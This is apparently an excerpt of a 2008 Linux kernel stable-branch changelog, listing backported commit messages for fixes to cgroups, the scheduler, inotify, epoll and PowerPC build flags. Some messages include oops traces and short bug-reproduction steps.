commit 7b574b7b0124ed344911f5d581e9bc2d83bbeb19 upstream. The race is calling cgroup_clone() while umounting the ns cgroup subsys, and thus cgroup_clone() might access invalid cgroup_fs, or kill_sb() is called after cgroup_clone() created a new dir in it. The BUG I triggered is BUG_ON(root->number_of_cgroups != 1); ------------[ cut here ]------------ kernel BUG at kernel/cgroup.c:1093! invalid opcode: 0000 [#1] SMP ... Process umount (pid: 5177, ti=e411e000 task=e40c4670 task.ti=e411e000) ... Call Trace: [<c0493df7>] ? deactivate_super+0x3f/0x51 [<c04a3600>] ? mntput_no_expire+0xb3/0xdd [<c04a3ab2>] ? sys_umount+0x265/0x2ac [<c04a3b06>] ? sys_oldumount+0xd/0xf [<c0403911>] ? sysenter_do_call+0x12/0x31 ... EIP: [<c0456e76>] cgroup_kill_sb+0x23/0xe0 SS:ESP 0068:e411ef2c ---[ end trace c766c1be3bf944ac ]--- Cc: Serge E. Hallyn <serue@us.ibm.com> Signed-off-by: Li Zefan <lizf@cn.fujitsu.com> Cc: Paul Menage <menage@google.com> Cc: "Serge E. Hallyn" <serue@us.ibm.com> Cc: Balbir Singh <balbir@in.ibm.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2008-12-18Revert "sched_clock: prevent scd->clock from moving backwards"Linus Torvalds
commit ca7e716c7833aeaeb8fedd6d004c5f5d5e14d325 upstream. This reverts commit 5b7dba4ff834259a5623e03a565748704a8fe449, which caused a regression in hibernate, reported by and bisected by Fabio Comolli. This revert fixes http://bugzilla.kernel.org/show_bug.cgi?id=12155 http://bugzilla.kernel.org/show_bug.cgi?id=12149 Bisected-by: Fabio Comolli <fabio.comolli@gmail.com> Requested-by: Rafael J. Wysocki <rjw@sisk.pl> Acked-by: Dave Kleikamp <shaggy@linux.vnet.ibm.com> Cc: Peter Zijlstra <a.p.zijlstra@chello.nl> Cc: Ingo Molnar <mingo@elte.hu> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2008-12-13fix mapping_writably_mapped()Hugh Dickins
commit b88ed20594db2c685555b68c52b693b75738b2f5 upstream. Lee Schermerhorn noticed yesterday that I broke the mapping_writably_mapped test in 2.6.7! Bad bad bug, good good find. The i_mmap_writable count must be incremented for VM_SHARED (just as i_writecount is for VM_DENYWRITE, but while holding the i_mmap_lock) when dup_mmap() copies the vma for fork: it has its own more optimal version of __vma_link_file(), and I missed this out. So the count was later going down to 0 (dangerous) when one end unmapped, then wrapping negative (inefficient) when the other end unmapped. The only impact on x86 would have been that setting a mandatory lock on a file which has at some time been opened O_RDWR and mapped MAP_SHARED (but not necessarily PROT_WRITE) across a fork, might fail with -EAGAIN when it should succeed, or succeed when it should fail. But those architectures which rely on flush_dcache_page() to flush userspace modifications back into the page before the kernel reads it, may in some cases have skipped the flush after such a fork - though any repetitive test will soon wrap the count negative, in which case it will flush_dcache_page() unnecessarily. Fix would be a two-liner, but mapping variable added, and comment moved. Reported-by: Lee Schermerhorn <Lee.Schermerhorn@hp.com> Signed-off-by: Hugh Dickins <hugh@veritas.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2008-12-13sched: CPU remove deadlock fixBrian King
commit 9a2bd244e18ffbb96c8b783210fda4eded7c7e6f upstream. Impact: fix possible deadlock in CPU hot-remove path This patch fixes a possible deadlock scenario in the CPU remove path. migration_call grabs rq->lock, then wakes up everything on rq->migration_queue with the lock held. Then one of the tasks on the migration queue ends up calling tg_shares_up which then also tries to acquire the same rq->lock. [c000000058eab2e0] c000000000502078 ._spin_lock_irqsave+0x98/0xf0 [c000000058eab370] c00000000008011c .tg_shares_up+0x10c/0x20c [c000000058eab430] c00000000007867c .walk_tg_tree+0xc4/0xfc [c000000058eab4d0] c0000000000840c8 .try_to_wake_up+0xb0/0x3c4 [c000000058eab590] c0000000000799a0 .__wake_up_common+0x6c/0xe0 [c000000058eab640] c00000000007ada4 .complete+0x54/0x80 [c000000058eab6e0] c000000000509fa8 .migration_call+0x5fc/0x6f8 [c000000058eab7c0] c000000000504074 .notifier_call_chain+0x68/0xe0 [c000000058eab860] c000000000506568 ._cpu_down+0x2b0/0x3f4 [c000000058eaba60] c000000000506750 .cpu_down+0xa4/0x108 [c000000058eabb10] c000000000507e54 .store_online+0x44/0xa8 [c000000058eabba0] c000000000396260 .sysdev_store+0x3c/0x50 [c000000058eabc10] c0000000001a39b8 .sysfs_write_file+0x124/0x18c [c000000058eabcd0] c00000000013061c .vfs_write+0xd0/0x1bc [c000000058eabd70] c0000000001308a4 .sys_write+0x68/0x114 [c000000058eabe30] c0000000000086b4 syscall_exit+0x0/0x40 Signed-off-by: Brian King <brking@linux.vnet.ibm.com> Acked-by: Peter Zijlstra <peterz@infradead.org> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2008-12-13sched: fix a bug in sched domain degenerateLi Zefan
commit f29c9b1ccb52904ee442a933cf3dee628f9f4e62 upstream. Impact: re-add incorrectly eliminated sched domain layers (1) on i386 with SCHED_SMT and SCHED_MC enabled # mount -t cgroup -o cpuset xxx /mnt # echo 0 > /mnt/cpuset.sched_load_balance # mkdir /mnt/0 # echo 0 > /mnt/0/cpuset.cpus # dmesg CPU0 attaching sched-domain: domain 0: span 0 level CPU groups: 0 (2) on i386 with SCHED_MC enabled but SCHED_SMT disabled # same with (1) # dmesg CPU0 attaching NULL sched-domain. The bug is that some sched domains may be skipped unintentionally when degenerating (optimizing) sched domains. Signed-off-by: Li Zefan <lizf@cn.fujitsu.com> Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl> Signed-off-by: Ingo Molnar <mingo@elte.hu> Cc: Gregory Haskins <ghaskins@novell.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2008-12-05Remove -mno-spe flags as they dont belongKumar Gala
commit 65ecc14a30ad21bed9aabdfd6a2ae1a1aaaa6a00 upstream, tweaked to get it to apply to 2.6.27 For some unknown reason at Steven Rostedt added in disabling of the SPE instruction generation for e500 based PPC cores in commit 6ec562328fda585be2d7f472cfac99d3b44d362a. We are removing it because: 1. It generates e500 kernels that don't work 2. its not the correct set of flags to do this 3. we handle this in the arch/powerpc/Makefile already 4. its unknown in talking to Steven why he did this Signed-off-by: Kumar Gala <galak@kernel.crashing.org> Tested-and-Acked-by: Steven Rostedt <srostedt@redhat.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2008-12-05Fix inotify watch removal/umount racesAl Viro
commit 8f7b0ba1c853919b85b54774775f567f30006107 upstream. Inotify watch removals suck violently. To kick the watch out we need (in this order) inode->inotify_mutex and ih->mutex. That's fine if we have a hold on inode; however, for all other cases we need to make damn sure we don't race with umount. We can *NOT* just grab a reference to a watch - inotify_unmount_inodes() will happily sail past it and we'll end with reference to inode potentially outliving its superblock. Ideally we just want to grab an active reference to superblock if we can; that will make sure we won't go into inotify_umount_inodes() until we are done. Cleanup is just deactivate_super(). However, that leaves a messy case - what if we *are* racing with umount() and active references to superblock can't be acquired anymore? We can bump ->s_count, grab ->s_umount, which will almost certainly wait until the superblock is shut down and the watch in question is pining for fjords. That's fine, but there is a problem - we might have hit the window between ->s_active getting to 0 / ->s_count - below S_BIAS (i.e. the moment when superblock is past the point of no return and is heading for shutdown) and the moment when deactivate_super() acquires ->s_umount. We could just do drop_super() yield() and retry, but that's rather antisocial and this stuff is luser-triggerable. OTOH, having grabbed ->s_umount and having found that we'd got there first (i.e. that ->s_root is non-NULL) we know that we won't race with inotify_umount_inodes(). So we could grab a reference to watch and do the rest as above, just with drop_super() instead of deactivate_super(), right? Wrong. We had to drop ih->mutex before we could grab ->s_umount. So the watch could've been gone already. That still can be dealt with - we need to save watch->wd, do idr_find() and compare its result with our pointer. If they match, we either have the damn thing still alive or we'd lost not one but two races at once, the watch had been killed and a new one got created with the same ->wd at the same address. That couldn't have happened in inotify_destroy(), but inotify_rm_wd() could run into that. Still, "new one got created" is not a problem - we have every right to kill it or leave it alone, whatever's more convenient. So we can use idr_find(...) == watch && watch->inode->i_sb == sb as "grab it and kill it" check. If it's been our original watch, we are fine, if it's a newcomer - nevermind, just pretend that we'd won the race and kill the fscker anyway; we are safe since we know that its superblock won't be going away. And yes, this is far beyond mere "not very pretty"; so's the entire concept of inotify to start with. Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> Acked-by: Greg KH <greg@kroah.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2008-12-05epoll: introduce resource usage limitsDavide Libenzi
commit 7ef9964e6d1b911b78709f144000aacadd0ebc21 upstream. It has been thought that the per-user file descriptors limit would also limit the resources that a normal user can request via the epoll interface. Vegard Nossum reported a very simple program (a modified version attached) that can make a normal user to request a pretty large amount of kernel memory, well within the its maximum number of fds. To solve such problem, default limits are now imposed, and /proc based configuration has been introduced. A new directory has been created, named /proc/sys/fs/epoll/ and inside there, there are two configuration points: max_user_instances = Maximum number of devices - per user max_user_watches = Maximum number of "watched" fds - per user The current default for "max_user_watches" limits the memory used by epoll to store "watches", to 1/32 of the amount of the low RAM. As example, a 256MB 32bit machine, will have "max_user_watches" set to roughly 90000. That should be enough to not break existing heavy epoll users. The default value for "max_user_instances" is set to 128, that should be enough too. This also changes the userspace, because a new error code can now come out from EPOLL_CTL_ADD (-ENOSPC). The EMFILE from epoll_create() was already listed, so that should be ok. [akpm@linux-foundation.org: use get_current_user()] Signed-off-by: Davide Libenzi <davidel@xmailserver.org> Cc: Michael Kerrisk <mtk.manpages@gmail.com> Cc: Cyrill Gorcunov <gorcunov@gmail.com> Reported-by: Vegard Nossum <vegardno@ifi.uio.no> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2008-12-05cgroups: fix a serious bug in cgroupstatsLi Zefan
commit 33d283bef23132c48195eafc21449f8ba88fce6b upstream. Try this, and you'll get oops immediately: # cd Documentation/accounting/ # gcc -o getdelays getdelays.c # mount -t cgroup -o debug xxx /mnt # ./getdelays -C /mnt/tasks Because a normal file's dentry->d_fsdata is a pointer to struct cftype, not struct cgroup. After the patch, it returns EINVAL if we try to get cgroupstats from a normal file. Cc: Balbir Singh <balbir@linux.vnet.ibm.com> Signed-off-by: Li Zefan <lizf@cn.fujitsu.com> Acked-by: Paul Menage <menage@google.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>